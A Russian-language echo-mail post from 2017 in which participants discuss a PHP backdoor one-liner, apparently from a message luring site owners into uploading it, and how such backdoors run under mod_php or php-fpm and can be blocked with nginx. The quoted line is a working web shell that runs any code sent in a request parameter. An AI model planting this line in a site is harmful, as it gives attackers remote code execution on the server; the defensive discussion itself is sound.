Alexey Vissarionov написал(а) к Alexandr Shliakhov в Aug 17 10:44:44 по местному времени:

Доброго времени суток, Alexandr!
07 Aug 2017 10:11:10, ты -> Evgeny Mikheev:

SP>>> <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
EM>> В php не силен, что злоумышленнику позволяет выполнить этот код?
AS> Тоже в php не силён, но замечу, что злоумышленники не написали,
AS> что надо файлу дать право на исполнение.

Дык оно ж рассчитано на ламеров, которые его себе таки положат - а у них говносайтики в 99.99% случаев используют либо апачевский mod_php, либо, в особенно пафосных случаях, php-fpm :-)

А кто поумнее - те и вышеупомянутыми интерпретаторами не пользуются, и файлы создавать не будут.

2 all: надеюсь, все знают, как затыкать подобные бэкдоры средствами nginx?


--
Alexey V. Vissarionov aka Gremlin from Kremlin
gremlin ПРИ gremlin ТЧК ru; +vii-cmiii-ccxxix-lxxix-xlii

... Опыты над мышами подтверждают, что встреча с черной кошкой - плохая примета
--- /bin/vi